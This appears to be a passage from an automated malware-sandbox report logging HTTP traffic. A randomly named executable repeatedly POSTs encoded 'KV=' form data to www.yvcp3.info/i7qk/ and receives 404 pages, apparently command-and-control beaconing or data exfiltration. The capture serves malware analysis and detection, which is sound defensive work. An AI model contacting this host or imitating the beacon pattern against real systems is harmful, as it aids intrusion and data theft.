                                                                                                                        Data Ascii: wBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/uuXvz1PLOr5fZ/dbWbVCzCMhrkwWpBKIw13fRA+BxWO6D0BaArrBTakEQPh0wUICvsACE+gpbvOa6znkowE0AZntGEmNVUnJzFwIbvWEVVUWYEYC2Lu2dhz
                                                                                                                        Nov 20, 2024 16:54:33.843885899 CET1236INData Raw: 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37 37 36 48 78 69 6b 34 44 69 43 67 47 51 42 63 38 48 43 5a 69 65 62 6f 4d 74 78 59 61 61 67 31 35 69 6a 34 57 77 42 59 61 32 38 35 6d 51 43 63 44 54 73 4a 4f 65 41 4d 44 4b 31 6e 4a 33 31 73 46 38
                                                                                                                        Data Ascii: aZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8otMbABahkHg2jsPZmHjTPXBok+9wCwDbaWy7ImOkSF7HshljJTH4lfbRcJAk2+k8RO
                                                                                                                        Nov 20, 2024 16:54:33.843902111 CET1236INData Raw: 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58 79 38 74 41 37 50 72 73 4c 4b 74 59
                                                                                                                        Data Ascii: gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP7aB/DgAjwOy5
                                                                                                                        Nov 20, 2024 16:54:33.843915939 CET1236INData Raw: 2f 49 48 70 52 2b 6f 59 72 4a 7a 34 4f 56 4b 6e 48 76 6c 32 72 61 65 32 6b 33 4f 77 6c 49 6d 4e 68 65 57 61 33 44 55 62 39 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55
                                                                                                                        Data Ascii: /IHpR+oYrJz4OVKnHvl2rae2k3OwlImNheWa3DUb9IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyj
                                                                                                                        Nov 20, 2024 16:54:33.844024897 CET1236INData Raw: 2f 52 31 55 31 4a 37 78 59 51 75 75 39 63 74 65 64 79 2b 74 2b 4e 52 30 66 4d 36 50 5a 71 37 39 63 53 45 76 38 55 6d 4b 73 55 53 45 4c 6c 31 72 49 43 33 47 4e 41 59 77 33 47 50 57 2f 35 2f 30 6e 59 76 37 74 36 31 30 4d 75 47 34 76 74 50 6e 67 6a
                                                                                                                        Data Ascii: /R1U1J7xYQuu9ctedy+t+NR0fM6PZq79cSEv8UmKsUSELl1rIC3GNAYw3GPW/5/0nYv7t610MuG4vtPngjRuvICHlK/h4JePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0B
                                                                                                                        Nov 20, 2024 16:54:33.844039917 CET1236INData Raw: 77 74 70 2f 46 79 69 56 6b 59 41 76 6b 33 38 43 6c 6c 44 73 2f 6e 2b 7a 39 50 2b 35 75 57 6b 4a 33 6c 75 39 4c 53 49 43 50 6c 36 43 65 4d 2f 64 69 2f 4a 61 49 2f 65 75 32 42 6d 71 39 6d 77 76 45 32 64 31 2b 7a 73 4d 66 77 47 44 49 75 34 76 4c 2f
                                                                                                                        Data Ascii: wtp/FyiVkYAvk38CllDs/n+z9P+5uWkJ3lu9LSICPl6CeM/di/JaI/eu2Bmq9mwvE2d1+zsMfwGDIu4vL/iWOKwPARXtGqdm5nd6MuXUakvTw1rnEzgIIkiTpIWndIG/1GOoaFgxvjS3VBhHARBYV68lfk5kOO6NdAJAY67TujGEYZu76COzBLiOVRoPK9Sv4ev05deGIMpuXb7kd/l6dYH/996qSe//dGGL1FQ1G/XQAsZAVQe
                                                                                                                        Nov 20, 2024 16:54:33.844053030 CET945INData Raw: 48 4a 32 45 2f 47 71 75 36 30 38 42 51 41 77 68 76 35 54 74 7a 48 38 44 71 59 76 30 48 34 41 4b 48 39 56 61 39 38 43 54 49 6d 6b 31 2f 6b 6d 75 31 39 4e 70 77 37 71 74 4a 52 2f 76 48 39 4c 42 4b 59 6c 48 4a 6a 54 71 74 49 45 77 4a 56 41 6c 78 6f
                                                                                                                        Data Ascii: HJ2E/Gqu608BQAwhv5TtzH8DqYv0H4AKH9Va98CTImk1/kmu19Npw7qtJR/vH9LBKYlHJjTqtIEwJVAlxo/ZtOFPdv0QjNcd/6+Dt60BOA4g2xA5v6kT33YR4GQoUMe9n5XSp2ahxKkR2CAAgsfvsStp9qyRVzxt13n6jbrspNKzlMBBsJdkCYEXplj/xMMbmAcqKblgkqf+2K9O7Y+Pht0AUYL6TVqWEl+YICKmH76UkwE+rJJ
                                                                                                                        Nov 20, 2024 16:54:33.965728998 CET1236INData Raw: 7a 77 5a 37 2b 38 64 38 65 6d 54 62 6b 43 56 6e 39 6f 79 74 34 68 50 55 68 69 4f 79 47 37 46 63 67 50 6f 41 66 6a 49 59 39 58 4d 4e 52 72 30 53 37 58 53 33 49 44 47 32 45 34 44 64 70 2b 79 31 31 49 77 75 57 48 7a 30 49 42 69 37 41 59 76 31 35 74
                                                                                                                        Data Ascii: zwZ7+8d8emTbkCVn9oyt4hPUhiOyG7FcgPoAfjIY9XMNRr0S7XS3IDG2E4Ddp+y11IwuWHz0IBi7AYv15tHbV54C4NO8cvD7NLhJKAT+LTtN/AFIReclepCx4iBk9RBFWESpzfH6T41lq08fzbXmHGtXJSIWvrpXFFxqBsNO5ztaPPLUEyYA2AYgzJFrOaJrlQJ9eizdd/b9976O7ozaFY6A4+yn0HD4CL9l7oA39xvk9eWHYfj


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.114986847.254.140.255803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:54:40.038867950 CET768OUTPOST /i7qk/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.yvcp3.info
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 199
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.yvcp3.info
                                                                                                                        Referer: http://www.yvcp3.info/i7qk/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 2f 33 72 2b 74 55 45 2f 76 53 4b 72 72 33 70 38 4b 45 48 6f 63 78 56 75 46 52 6c 48 4f 52 63 48 66 37 79 79 4f 6e 5a 71 48 6a 4c 77 4b 59 55 50 63 6a 68 7a 33 68 67 65 73 2f 64 78 59 6c 30 72 32 78 76 49 72 53 6a 4a 64 48 32 38 30 6b 62 6d 4a 37 35 47 62 57 70 73 4b 51 68 31 54 5a 65 6a 5a 56 4c 73 38 39 77 78 45 50 30 32 4d 30 4e 38 6f 31 58 72 63 6b 37 76 53 66 73 44 67 71 45 6c 34 48 58 34 78 33 50 4d 49 57 6d 45 61 30 4f 59 36 65 6e 6e 72 51 6f 76 69 2b 59 45 30 2b 54 50 43 6c 51 63 59 72 55 33 59 79 70 38 46 45 4a 50 58 53 74 71 41 36 5a 70 30 2f 77 6a 35 6d 39 7a 6d 67 3d 3d
                                                                                                                        Data Ascii: KV=/3r+tUE/vSKrr3p8KEHocxVuFRlHORcHf7yyOnZqHjLwKYUPcjhz3hges/dxYl0r2xvIrSjJdH280kbmJ75GbWpsKQh1TZejZVLs89wxEP02M0N8o1Xrck7vSfsDgqEl4HX4x3PMIWmEa0OY6ennrQovi+YE0+TPClQcYrU3Yyp8FEJPXStqA6Zp0/wj5m9zmg==
                                                                                                                        Nov 20, 2024 16:54:41.382460117 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.20.1
                                                                                                                        Date: Wed, 20 Nov 2024 15:54:41 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        X-Trace: 2B827006D5FA5D2A668DF1F10DD85BD93FC0BBDD41A6C8C715597A37B800
                                                                                                                        Set-Cookie: _csrf=6963693ee978f7dbcf6789af428e22034f771aa8755334f418a640c97d4b0001a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Wbx2eb7MF_6Z_AlYJ8nKV6VYQRuXr8sy%22%3B%7D; path=/; HttpOnly
                                                                                                                        Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 52 37 74 70 2d 6f 73 63 50 47 33 44 34 70 70 6b 47 37 4b 71 63 77 4f 58 62 5f 48 30 36 7a 69 68 77 6b 36 58 64 6f 67 42 34 30 73 51 32 52 48 49 37 6e 34 4c 49 49 57 39 72 44 35 45 38 38 59 71 53 61 38 42 75 71 4c 64 62 76 69 54 48 4f 49 75 2d 6a 6d 51 4d 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                                                                        Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="R7tp-oscPG3D4ppkG7KqcwOXb_H06zihwk6XdogB40sQ2RHI7n4LIIW9rD5E88YqSa8BuqLdbviTHOIu-jmQMg=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                                                                        Nov 20, 2024 16:54:41.382479906 CET18INData Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: y></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.114987547.254.140.255803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:54:42.710643053 CET788OUTPOST /i7qk/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.yvcp3.info
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 219
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.yvcp3.info
                                                                                                                        Referer: http://www.yvcp3.info/i7qk/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 2f 33 72 2b 74 55 45 2f 76 53 4b 72 71 58 35 38 4c 6a 54 6f 64 52 56 70 5a 42 6c 48 48 78 63 44 66 37 2b 79 4f 6c 31 36 48 51 2f 77 4a 36 4d 50 64 67 35 7a 30 68 67 65 30 76 64 6f 58 46 30 67 32 78 69 33 72 54 76 4a 64 47 53 38 30 6c 72 6d 4a 73 4e 48 4a 57 70 75 43 77 68 33 64 35 65 6a 5a 56 4c 73 38 2b 4d 62 45 4a 63 32 4d 46 39 38 6e 77 37 30 56 45 37 67 56 66 73 44 33 61 45 68 34 48 58 4b 78 31 72 69 49 55 4f 45 61 78 4b 59 36 4b 4c 6f 69 51 6f 74 76 65 5a 51 34 63 4c 42 46 55 5a 32 57 61 73 43 4d 51 34 65 4a 69 45 56 48 78 6b 39 44 70 52 72 67 5a 52 54 77 58 59 36 39 67 77 4b 56 61 66 68 54 4c 64 51 30 68 78 64 76 47 65 55 79 6e 6f 3d
                                                                                                                        Data Ascii: KV=/3r+tUE/vSKrqX58LjTodRVpZBlHHxcDf7+yOl16HQ/wJ6MPdg5z0hge0vdoXF0g2xi3rTvJdGS80lrmJsNHJWpuCwh3d5ejZVLs8+MbEJc2MF98nw70VE7gVfsD3aEh4HXKx1riIUOEaxKY6KLoiQotveZQ4cLBFUZ2WasCMQ4eJiEVHxk9DpRrgZRTwXY69gwKVafhTLdQ0hxdvGeUyno=
                                                                                                                        Nov 20, 2024 16:54:44.010560989 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.20.1
                                                                                                                        Date: Wed, 20 Nov 2024 15:54:43 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        X-Trace: 2B75C737181E93405B8B6E7D403579FA221C236A49ABA5DB34E05FC7A000
                                                                                                                        Set-Cookie: _csrf=0aedfcd0a726c28ce4593cd026a05c19164dc103a2daf8dad6c6579bc87ae7a8a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-zILHEb-FCz4YVLUD1zZFDXRE4cDKPb7%22%3B%7D; path=/; HttpOnly
                                                                                                                        Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6b 49 67 47 39 38 41 5f 59 66 35 41 6f 6b 33 6c 57 45 54 76 61 37 59 5a 55 5a 31 6c 72 7a 50 65 7a 44 79 61 4a 4b 36 56 7a 64 71 39 38 6b 2d 37 69 48 6f 44 30 77 62 68 4e 39 45 42 45 71 4d 2d 38 69 67 72 78 79 50 72 61 34 79 4a 43 50 6c 67 35 63 57 76 37 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                                                                        Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="kIgG98A_Yf5Aok3lWETva7YZUZ1lrzPezDyaJK6Vzdq98k-7iHoD0wbhN9EBEqM-8igrxyPra4yJCPlg5cWv7Q=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                                                                        Nov 20, 2024 16:54:44.010575056 CET18INData Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: y></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.114988347.254.140.255803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:54:45.376678944 CET1801OUTPOST /i7qk/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.yvcp3.info
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1231
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.yvcp3.info
                                                                                                                        Referer: http://www.yvcp3.info/i7qk/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 2f 33 72 2b 74 55 45 2f 76 53 4b 72 71 58 35 38 4c 6a 54 6f 64 52 56 70 5a 42 6c 48 48 78 63 44 66 37 2b 79 4f 6c 31 36 48 52 48 77 4b 4a 45 50 63 42 35 7a 31 68 67 65 71 2f 64 31 58 46 30 48 32 78 37 2b 72 54 79 38 64 46 36 38 6d 32 6a 6d 65 74 4e 48 54 47 70 75 4f 51 68 30 54 5a 66 35 5a 56 62 33 38 39 6b 62 45 4a 63 32 4d 47 6c 38 67 6c 58 30 54 45 37 76 53 66 73 50 67 71 45 4a 34 48 50 61 78 31 2f 63 49 6b 75 45 61 52 36 59 33 5a 7a 6f 70 51 6f 72 71 65 5a 59 34 63 32 44 46 55 56 51 57 61 6f 34 4d 53 59 65 61 55 46 32 56 79 34 32 66 61 6c 5a 2b 35 68 63 78 56 45 4c 36 53 45 78 59 36 72 53 4d 72 52 72 77 69 30 6e 72 54 47 46 72 7a 4f 61 77 50 53 6f 5a 70 35 4f 4b 73 71 32 41 71 70 6b 66 50 2b 43 54 4a 6e 4f 51 52 47 61 44 77 47 31 6f 45 54 62 67 64 49 6b 49 32 42 38 35 4d 72 4c 2f 47 6f 35 34 34 55 77 4d 74 4a 6c 36 41 6d 4a 38 43 71 74 76 75 58 54 76 34 78 5a 6c 34 38 75 54 56 63 62 31 48 36 7a 48 78 62 57 39 59 66 6c 59 72 46 78 38 67 50 62 65 61 4e 4d 2f 37 76 75 71 75 69 51 6f 59 63 [TRUNCATED]
                                                                                                                        Data Ascii: KV=/3r+tUE/vSKrqX58LjTodRVpZBlHHxcDf7+yOl16HRHwKJEPcB5z1hgeq/d1XF0H2x7+rTy8dF68m2jmetNHTGpuOQh0TZf5ZVb389kbEJc2MGl8glX0TE7vSfsPgqEJ4HPax1/cIkuEaR6Y3ZzopQorqeZY4c2DFUVQWao4MSYeaUF2Vy42falZ+5hcxVEL6SExY6rSMrRrwi0nrTGFrzOawPSoZp5OKsq2AqpkfP+CTJnOQRGaDwG1oETbgdIkI2B85MrL/Go544UwMtJl6AmJ8CqtvuXTv4xZl48uTVcb1H6zHxbW9YflYrFx8gPbeaNM/7vuquiQoYctYzAHMx0uhg7kJmZlwWDYEeiQrn9KnWOv3vAKrzsPXfcb7Uf06W9AVX4cxu8VoknMF4Ggfjv4+bPBN7VSpVl96dfqoB70eekFNV1ge+a/B+cvudN2ZecypxXo2R6lT98QG+COszO4mtIH/V8yFTTRmpF5XfwHIOZIxnOQO1xC7JM8HvgfbjSy9XNgCD5MeTJShmOoCtbABo+Ep+iTJeEcUgX8QN0EQhzqa3weKeY952C+M/foVrQC2IlmbrBW9UJjpi1jQwGSqV4dil/McJazs7MLOqVpHl36TkBDa4P0M3ywnDekYfgXbGLSPiDw6dCTBPaJnzR+9lFkDU/yZC/3VilDGYok1QVw5LisW88hb5COc0eNxinWJzhq1bhypg8qCt+00GvB9Lv9jJRGNlUrKeDGGfKg+FPvlJNH05WQVnJL78y3cMXQEy8TZF39blGQ/4NYpT9LMAsp9Y+6k3vlXGJcy2Hvrv5d+gpytUCLGUf/Y0W2VN4pNmdBJLtcvohDCKFuRXQJna9TGemi6EaQSJ3QzkYYq110xi0NCaV87edutnzWnk50gySfkIonGe1e2ueTnJaIssl7lZ94AzlTB4ENJOucjagF/w4DfYzLQX65umLDS/wl7m3lTmqbNaoPXEYsCYhhgU8ym9c7/BA2XYjViv2IOhnoO [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:54:46.808352947 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.20.1
                                                                                                                        Date: Wed, 20 Nov 2024 15:54:46 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        X-Trace: 2BB4D9C1893174E3A86C5B2AFB2C366A92626823D50195A73132817DB500
                                                                                                                        Set-Cookie: _csrf=1dc6e3e4752f1f5082c624de0e81e29f08d017db963d6af5630ae806ab97175fa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22AR96HRKOhNqODEGFZ5tSKAZZk2ZA1DHS%22%3B%7D; path=/; HttpOnly
                                                                                                                        Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 43 67 38 47 37 78 4c 50 71 6d 4e 45 4f 42 69 38 74 48 68 58 58 33 4d 68 59 38 37 4e 58 78 4e 37 45 6a 56 38 36 51 41 76 30 35 31 65 67 55 74 39 42 6c 31 35 75 56 65 6b 53 32 32 6c 4b 59 62 4a 5f 6e 78 33 48 42 30 4a 68 65 48 65 6f 2d 79 6c 55 54 33 48 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                                                                        Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="NCg8G7xLPqmNEOBi8tHhXX3MhY87NXxN7EjV86QAv051egUt9Bl15uVekS22lKYbJ_nx3HB0JheHeo-ylUT3HQ=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                                                                                                                        Nov 20, 2024 16:54:46.808371067 CET18INData Raw: 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: y></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        8192.168.2.114988947.254.140.255803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:54:48.059866905 CET502OUTGET /i7qk/?KV=y1Deuhcniwy3qxxQAmTyamEbBAp7BzgQf56uDV1XLiTDd60qTBhOzyQcu/peRmYp6AfM2zjHYnfo1VupJPImQ14HHScIWb6hMHv5+s8iUY9NL2Qo8ivIVjo=&Wno=a0qDq HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Host: www.yvcp3.info
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Nov 20, 2024 16:54:49.320790052 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.20.1
                                                                                                                        Date: Wed, 20 Nov 2024 15:54:49 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        X-Trace: 2BF3C869D8A38C0AD14EBD5F51889EF053DE6C9A48D7104F63C9051A1100
                                                                                                                        Set-Cookie: _csrf=16f98d3123ce523e4b6654e1ce653129825bbe36aabd52dd62556e36999a4286a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22X0A_Klrpmg-h2YkptVVKLhKE1qKyXIJj%22%3B%7D; path=/; HttpOnly
